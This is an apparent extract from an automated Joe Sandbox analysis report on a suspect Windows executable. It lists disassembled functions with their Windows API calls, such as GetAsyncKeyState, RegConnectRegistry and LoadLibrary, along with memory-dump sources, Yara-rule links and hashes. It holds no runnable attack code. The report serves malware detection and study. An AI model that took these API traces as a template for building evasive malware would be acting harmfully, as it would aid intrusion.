                                                                                                                                                                                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 3884216118-234962358
                                                                                                                                                                                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                                                                                                Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                                                                                                Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$_memmove_wcslen
                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                • API String ID: 1589278365-1403004172
                                                                                                                                                                                                                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                                                                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                                                                                                Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle
                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                                                                                                                Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle
                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                                                                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                                                                                                                Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                                                                • API String ID: 0-1011021900
                                                                                                                                                                                                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                                                                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                                                                                                                Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                • GetFocus.USER32 ref: 0046157B
                                                                                                                                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00461608
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                                                                                                                • String ID: %s%d
                                                                                                                                                                                                                • API String ID: 2645982514-1110647743
                                                                                                                                                                                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                                                                                                Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                                                                                                Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3488606520-0
                                                                                                                                                                                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                                                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                                                                                                Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15295421-0
                                                                                                                                                                                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                                                                                                                Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2449869053-0
                                                                                                                                                                                                                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                                                                                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                                                                                                                Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3539004672-0
                                                                                                                                                                                                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                                                                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                                                                                                                Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
